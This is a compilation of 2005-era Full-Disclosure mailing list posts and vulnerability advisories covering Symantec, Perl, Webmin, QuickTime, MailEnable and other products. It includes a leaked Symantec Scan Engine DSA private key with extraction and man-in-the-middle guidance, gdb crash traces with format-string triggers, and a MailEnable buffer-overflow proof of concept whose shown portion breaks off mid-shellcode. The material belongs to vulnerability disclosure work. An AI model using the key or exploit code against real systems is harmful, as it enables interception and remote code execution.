DSA private key, pre-generated by Symantec, is enforced in their SSL server in all tested versions of Symantec Scan Engine. End users are offered no way to change the key, and the key itself can be relatively easily extracted from any installation. The key can be found in the file servers.jar (located by default in C:\Program Files\Symantec\Scan Engine), which contains a java keystore file com/symantec/jsse/serverKeys protected by the password secret. The key entry is stored under the alias server and is protected by the password secret. This known immutable key renders SSL protection useless since the private key is known to anybody (see below for the key in PEM format). All Scan Engine installations use the same key. For example, attackers can combine ARP or DNS spoofing attacks with the knowledge of the private key to conduct man-in-the-middle attacks. -BEGIN DSA PRIVATE KEY- MIIBuwIBAAKBgQD9f1OBHXUSKVLfSpwu7OTn9hG3UjzvRADDHj+AtlEmaUVdQCJR +1k9jVj6v8X1ujD2y5tVbNeBO4AdNG/yZmC3a5lQpaSfn+gEexAiwk+7qdf+t8Yb +DtX58aophUPBPuD9tPFHsMCNVQTWhaRMvZ1864rYdcq7/IiAxmd0UgBxwIVAJdg UI8VIwvMspK5gqLrhAvwWBz1AoGBAPfhoIXWmz3ey7yrXDa4V7l5lK+7+jrqgvlX TAs9B4JnUVlXjrrUWU/mcQcQgYC0SRZxI+hMKBYTt88JMozIpuE8FnqLVHyNKOCj rh4rs6Z1kW6jfwv6ITVi8ftiegEkO8yk8b6oUZCJqIPf4VrlnwaSi2ZegHtVJWQB TDv+z0kqAoGAE9rKDKa4eOROFXX1/jy7sLH34OGTbTmsqYoEBTJt8DolJkr6L4kf SyOzpIhKB440mmXZMQJbXy0WNBCGzPjq6OHpI60KuBTskWAtPBEGE1jiov/7jK9b wCt6sTBqo3Ux5ygyjuFQyt89d+qTp9761Z32OvaBq+IJvZYWNM8M/2ECFDLgCI85 fJtA3mlq9Q1T6U36Kl7x -END DSA PRIVATE KEY- The private component of this DSA key is X: X = 0x32e0088f397c9b40de696af50d53e94dfa2a5ef1 A tool such as ssldump can be used to confirm the validity of the private key as shown above, by manually comparing its public part to the DSA public key embedded in the SSL server's certificate displayed by ssldump. 6. Credit This vulnerability was discovered by Marc Bevand of Rapid7. 7. Contact Information Rapid7, LLC Email: [EMAIL PROTECTED] Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any
[Full-disclosure] sendmail stuff
if anyone is playing with the sendmail bug stuff , here is what ive gotten thus far. http://rapturesecurity.org/jack/exploiting_sendmail.html if anyone has any luck i would like to hear about it :] -- Jack - [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow
Title: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow Apple Quicktime are vulnerable to a buffer overflow in the handling of .JPG/.PICT files Read the full advisory http://www.cirt.dk/advisories/cirt-41-advisory.pdf CIRT.DK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] QUICKTIME vuln: Apple pulls a Microsoft stunt
Title: QUICKTIME vuln: Apple pulls a Microsoft stunt Hey there Just an update it seems that Apple uses the same developers as Microsoft Apple QuickTime is still vulnerable: Tested on MAC OS X and Windows Platform Save the following file and open with QuickTime http://www.cirt.dk/tools/exploits/Apple_VS_MS.jpg you could change the name to Apple_VS_MS.pict ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Perl format string integer wrap vulnerability
SUMMARY. perl suffers from an integer wrap overflow inside the explicit parameter format string functionality, this has been confirmed to be a vector for remote code execution. Date Found: September 23, 2005. Public Release: TBD. Application:perl Credit: Jack Louis of Dyad Security BACKGROUND. perl is a cross-platform scripting language. for more details see Perl.org DESCRIPTION. Value over INT_MAX(value of I) inside explicit parameter format string (%I$n) causes integer wrap in the efix (32bit signed integer) variable inside the function Perl_sv_vcatpvfn (see example 1) (sv.c:~9360). Allowing for a write value anywhere in memory exploitation vector (see example 2). Further, heap corruption itself is possible (see example 3), as are more exotic non-reliable $PC redirection (see example 4). From what we have seen the first exploitation method is the only valid one. ImmunitySec has found a generic method of controlling the first condition with a good amount of robustness and success. Perl itself is not directly vulnerable to remote attacks due to this flaw, however any perl program with format string vulnerabilities is. The vulnerability is not to limited DoS (as reported previously) but remote code execution as well as information leakage and DoS. IMPACT. Perl itself is not generally impacted by this vulnerability, but programs with format string vulnerabilities (Dyad Security has confirmed that several programs available at this time have this specific issue) can be vulnerable to remote code execution. Information about creating a robust generic exploit is forthcoming, so public knowledge of exploitation methods for this issue is in the cards. AFFECTED VERSIONS. Perl 5.9.2 and perl 5.8.6 have been tested and found to be vulnerable on linux, freebsd, dragonflybsd on the ia32 platform. It is assumed that a much larger range of software and platforms are also affected, as the sv.c seems to remain seemingly static over time, however this is not confirmed. EXAMPLE 1. $ gdb myperl/bin/perl5.8.7 GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type show copying to see the conditions. There is absolutely no warranty for GDB. Type show warranty for details. This GDB was configured as i686-pc-linux-gnu...Using host libthread_db library /lib/tls/libthread_db.so.1. (gdb) break sv.c:9232 Breakpoint 1 at 0x80c0df0: file sv.c, line 9232. (gdb) set args -e 'printf(%2147483647\$n);' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x0, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbffb72cb ) at sv.c:9232 9232in sv.c (gdb) p efix $1 = 2147483647 (gdb) set args -e 'printf(%2147483648\$n);' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x8000 Address 0x8000 out of bounds, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfb0640b ) at sv.c:9232 9232in sv.c (gdb) p efix $2 = -2147483648 (gdb) cont Modification of a read-only value attempted at -e line 1. Program exited with code 0377. (gdb) set args -e 'printf(%2147483649\$n);' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232 9232in sv.c (gdb) p efix $3 = -2147483647 (gdb) cont Program received signal SIGSEGV, Segmentation fault. Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 1652in sv.c (gdb) bt #0 Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 #1 0x080b6349 in Perl_sv_setuv_mg (sv=0x0, u=0) at sv.c:1743 #2 0x080c0e06 in Perl_sv_vcatpvfn (sv=0x812d180, pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232 #3 0x080e923b in Perl_do_sprintf (sv=0x812d180, len=1, sarg=0x813307c) at doop.c:713 #4 0x080de48a in Perl_pp_prtf () at pp_sys.c:1489 #5 0x080ad038 in Perl_runops_standard () at run.c:37 #6 0x080615c7 in S_run_body (oldscope=1) at perl.c:2000 #7 0x080613ff in perl_run (my_perl=0x812d008) at perl.c:1919 #8 0x0805e61f in main (argc=3, argv=0xbfe69da4, env=0xbfe69db4) at perlmain.c:98 (gdb) x/i $eip 0x80b61a8 Perl_sv_setiv+8:mov0x8(%ebx),%edx (gdb) i r ebx edx ebx0x0 0 edx0x812d180135451008 (gdb) EXAMPLE 2. #0 Perl_sv_setiv (sv=0x815f821, i=0) at sv.c:2184 2184SvIVX(sv) = i; (gdb) x/i $eip 0x80c815c Perl_sv_setiv+108: mov%esi,0xc(%eax) EXAMPLE 3. #0 0xb7e69fb0 in malloc_consolidate () from /lib/tls/libc.so.6 EXAMPLE 4. #0 0x09010e50 in ?? () FIXES. Due to the information that has already been leaked we moved up the release date of this advisory. There is no official fix for this issue as of yet. We have provided a sample patch for the 5.9.2 version. See http
[Full-disclosure] Webmin miniserv.pl format string vulnerability
SUMMARY. The webmin `miniserv.pl' web server component is vulnerable to
a new class of exploitable (remote code) perl format string
vulnerabilities. During the login process it is possible to trigger this
vulnerability via a crafted username parameter containing format string
data. In the observed configuration the process was running as the user
root, so so if remote code execution is successful, it would lead to a
full remote root compromise in a standard configuration. A valid login
is not required to trigger this vulnerability, only access to the
miniserv.pl port (default 1).
Date Found: September 23, 2005.
Public Release: November 29, 2005.
Application:webmin miniserv.pl, all known versions
Credit: Jack Louis of Dyad Security
BACKGROUND. miniserv.pl is a part of the webmin system administration
front end, written in perl by Jamie Cameron. more details are available
at http://www.webmin.com.
DESCRIPTION. The username parameter of the login form is logged via the
perl `syslog' facility in an unsafe manner during a unknown user login
attempt. the perl syslog facility passes the username on to the variable
argument function sprintf that will treat any format specifiers and
process them accordingly.
DETAILS. The vectors for a simple DoS of the web server are to use the
%n and %0(large number)d inside of the username parameter, with the
former causing a write protection fault within perl leading to script
abortion, and the latter causing a large amount of memory to be
allocated inside of the perl process.
A generic remote code execution exploit method has been developed by a
third party that is reachable though this hole itself.
The following is the section of code in question. (from miniserv.pl)
if ($use_syslog !$validated) {
syslog(crit,
($nonexist ? Non-existent :
$expired ? Expired : Invalid).
login as $authuser from $acpthost);
}
As can be clearly seen with this section of code, the user supplied data
is clearly within the format specification of the syslog call.
Additional information and sample work around patches can be found at
http://www.dyadsecurity.com/webmin-0001.html
LEGAL NOTICES.
Copyright (C) 2005 Dyad Security, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of Dyad Security, Inc. If you wish to reprint the whole
or any part of this alert in any other medium other than electronically,
please email [EMAIL PROTECTED] for permission.
DISCLAIMER. The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal
Title: [CIRT.DK] Ipswitch Whatsup small Business 2004 - Directory Traversal Vendor: IpSwitch Product: Ipswitch Whatsup small Business 2004 Description: The Whatsup Small Business 2004 are vulnerable to a directory traversal attack using ../ Read the full advisory at http://www.cirt.dk CIRT.DK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK] - Novell ZENworks Patch Management Server 6.0.0.52 - SQL injection
The Novell ZENworks Patch Management Server 6.0.0.52 is vulnerable to SQL injection in the management console. To being able to exploit this issue the administrator have to manually created a none-privileged account as minimum, to allow exploitation. Fix: Upgrade to ZENworks Patch Management version 6.2.2.181 (or newer hot fix via your PLUS server) found at http://download.novell.com. Note: The 6.0.0.52 CD ISO image was on the Novell download site up until the 2nd week of September, 2005. The ZENworks Patch Management CD ISO image that is currently available at the download site at the time of this document being published http://download.novell.com/Download?buildid=5_kRStyf9wU~ ISO Name: ZEN_PatchMgmt_Upd6.2.iso Size: 323.8 MB (339607552) MD5: aeb244ecdf29c83cb8388fae1a6a1919 A technical description of the vulnerability can be read at: http://www.cirt.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept
Attached is a proof of concept for the MailEnable W3C Logging vulnerability. It features a special type of patching shellcode designed to quickly and easily secure this vulnerability across your network. I am releasing this in hopes that other POC writers will follow suit, releasing exploits that patch the vulnerability rather then exploit it for a malicious purpose. The reason this is being done is to support the admin rather then to support the hacker./* MailEnable W3C Logging Remote Buffer Overflow Proof of Concept This is a pretty standard stack overflow with a SE handler overwrite. The buffer used provides quite a bit of room for shellcode, so I've decided to construct a shellcode that as far as I know hasn't been made. The shellcode provided will transport a 1008 byte win32 PE executable file. The shellcode will then save it to disk, run the executable, and close the server. The executable will serve as a small patching tool, which will download the patch provided by mailenable.com,unzip it, restart the service, and copy the patched exe. This shellcode will eliminate the very hole it used to gain access. The old server executable will not be deleted, merely renamed to _MEIMAPS.exe. For those paranoid individuals who cannot read C code, YOUR-Address can be anything as long as the length is the same as the real IP. If your IP is 192.168.0.1, then 111.222.3.4 will work fine. We're only using it to calculate the length of the buffer for stack alignment. As you can see, there is no call home code here :) If you have any questions about this exploit, or how you may use it on your network to quickly patch your Mail Enable installations, please feel free to e-mail us at [EMAIL PROTECTED] */ #include stdio.h #include string.h #include winsock.h #pragma comment(lib,ws2_32) long gimmeip(char *hostname); void makeSpaceTaker(char *buff, int len); char buffer[7300]; //Simple XOR'd 2-stage shellcode //Some parts of this shellcode were taken from vlad902's toolset. //Saves omg.exe to disk and runs. char patchshell[]= \xEB\x17\x31\xC0\x66\xB8\x02\x05\x8B\x34 \x24\x66\x81\x36\x1E\x17\x83\xC6\x02\x83 \xE8\x02\x75\xF3\xC3\xE8\xE4\xFF\xFF\xFF \xE2\xFF\xFB\x17\x1E\x17\x48\x9C\x5B\x2B \x95\x6B\x1B\x6F\x1F\xF8\x95\x58\x06\x9C \x41\x37\x1F\xFC\xFD\x39\x57\x9C\x2A\x9C \x1F\xF9\x2F\xD7\x87\xBB\x9A\xD7\x6A\x10 \xDF\xDD\x13\x16\xDC\xFC\xEA\x2C\x4A\x33 \x16\x62\xFD\x9C\x41\x33\x1F\xFC\x78\x9C \x12\x5C\x95\x48\x02\x16\xF5\x9C\x02\x9C \x1F\xFC\x40\xD4\x76\x61\x73\xA7\x5B\xE8 \xC8\x43\x41\x41\x76\x17\x1F\x17\x1E\x40 \x76\x17\x1E\x17\x1E\xE8\xCD\x49\x1F\xF7 \x56\x97\x26\x4B\x6B\xED\xD8\x17\x1E\x7F \x51\x14\xD9\xA8\xE1\xC1\x44\x43\xE1\xC4 \x76\xB2\x09\x17\x62\xE8\xC8\x7F\x7B\x6F \x7B\x17\x76\x78\x73\x70\x30\x9E\xFF\x41 \x74\x17\x74\x17\x74\x13\x74\x17\x74\x17 \x74\x15\x4F\xE8\xCD\x49\x4E\x7F\x01\x6E \x14\xFF\xE1\xC1\x46\x4F\x48\x47\x74\x17 \xF5\x4B\x44\x45\x76\xE7\x1D\x17\x1E\x96 \xDC\x13\x1E\x17\x1E\x45\x4E\xE8\xCD\x7F \xE5\x80\xE3\x18\xE1\xC1\x46\x4F\x48\x47 \xE1\xC4\x40\x7F\x60\xCF\xFC\x64\xE1\xC1 \x97\x0B\x3A\x7F\x86\xE9\x94\x19\xE1\xC1 \x47\x9E\xFF\x96\xDF\x1F\x1E\x17\x1E\x7D \x1E\x46\xE1\xC4\xDD\x26\xE8\x73\x95\x61 \x06\xBA\xB3\x9C\x76\xF3\x53\x71\x2F\xFA \x78\x96\x63\x17\x53\x4D\x6B\xE3\x40\xFE \x5C\xE8\xE1\xE8\xF6\x88\xE1\xE8\xE1\x56 \x5C\x54\x5A\x5A\x44\x87\x1E\x14\x1E\x17 \x1E\x13\x1E\x17\x1E\xE8\xE1\x17\x1E\xAF \x1E\x17\x1E\x17\x1E\x17\x1E\x57\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x97\x1E\x17\x1E\x19\x01\xAD \x10\x17\xAA\x1E\xD3\x36\xA6\x16\x52\xDA \x3F\x43\x76\x7E\x6D\x37\x6E\x65\x71\x70 \x6C\x76\x73\x37\x7D\x76\x70\x79\x71\x63 \x3E\x75\x7B\x37\x6C\x62\x70\x37\x77\x79 \x3E\x53\x51\x44\x3E\x7A\x71\x73\x7B\x39 \x13\x1A\x14\x33\x1E\x17\x1E\x17\x1E\x17 \x1E\x47\x5B\x17\x1E\x5B\x1F\x16\x1E\xCF \x35\x2D\x5D\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\xF7\x1E\x18\x1F\x1C\x1F\x15\x2C\x47 \x1C\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x57\x1C\x17\x1E\xB7\x1F\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x57\x1E\x07\x1E\x17 \x1E\x07\x1E\x17\x1E\x13\x1E\x17\x1E\x17 \x1E\x17\x1E\x13\x1E\x17\x1E\x17\x1E\x17 \x1E\xE7\x1D\x17\x1E\xB7\x1F\x17\x1E\x17 \x1E\x17\x1E\x14\x1E\x17\x1E\x17\x1E\x07 \x1E\x17\x0E\x17\x1E\x17\x1E\x07\x1E\x17 \x0E\x17\x1E\x17\x1E\x17\x1E\x07\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x0F \x1D\x17\x1E\x3F\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x77\x1D\x17 \x1E\x37\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17 \x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x39 \x6A\x72\x66\x63\x1E\x17\x1E\x5F\x1C\x17 \x1E\xB7\x1F\x17\x1E\x47\x1C\x17\x1E\xB7 \x1F\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17
Re: [Full-disclosure] MailEnable W3C Logging Remote Buffer Overflow Proof of Concept
We will patch you even if you want it or not ? :D First and foremost, This POC was designed for use network administrators on their own network. We never intended this to be converted into a bot and spread. I cant see how a bot that systematically disables its victims would spread that well anyway. We are attempting to facilitate the previously tedious job of patching multiple machines on a given network. Only those with malicious intent should find annoyance in this advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK - Advisory] Windows XP SP2 Local TFTP HEAP based Overflow
[Description] The Windows XP tftp.exe software is vulnerable to a local Heap Based overflow, allowing to run arbitrary commands on the system as the user issuing the overflow. [Complete advisory] CIRT.DK Advisory 38 can be read at http://www.cirt.dk/ Regards CIRT.DK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK - Advisory 37] TAC Vista Webstation 3.0 Directory Traversal bug in webinterface
TAC Vista is based on open technologies, TAC VistaR is one of the most advanced software solutions for building automation. TAC Vista efficiently and economically controls, checks and analyzes all building operations, allowing system operators to control and monitor entire systems on site or from remote locations. The Web application is running on a Microsoft IIS 5.0 Server in this case. The problem is occurring in the input field of where the Template is called, resulting in the possibility to traverse into other parts of the system. Read the full Advisory at http://www.cirt.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 3 minor vulnerabilities in IPSwitch products
The following 3 minor vulnerabilities were found in the products Whatsup Gold 8.04 and WhatsUp Small Business 2004 Ipswitch Whatsup Gold 8.04 - Access to view source code of all files(CIRT-34-advisory) Ipswitch Whatsup Gold 8.04 - Cross Site Scripting (CIRT-35-advisory) Ipswitch Whatsup small Business 2004 - Source code disclosure (CIRT-36-advisory) Read the full advisories at http://www.cirt.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CIRT.DK - Advisory] Novell iManager 2.0.2 ASN.1 Parsing vulnerability in Apache module
ID: NOVL102200 Domain: primus Solution Class: Novell Fact: Novell iManager 2.02 Fact: Apache 2.0.48 Fact: OpenSSL 0.9.7 Symptom: OpenSSL ASN.1 Parsing vulnerability in Apache Symptom: Server stops responding and an error occurs Cause: Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. These issues could be exploited to cause a denial of service or to execute arbitrary code. Fix: These vulnerabilites are corrected in OpenSSL 0.9.7d. iManager 2.5 ships with OpenSSL 0.9.7d - to resolve the vulnerability upgrading is suggested. Read the full advisory at http://www.cirt.dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
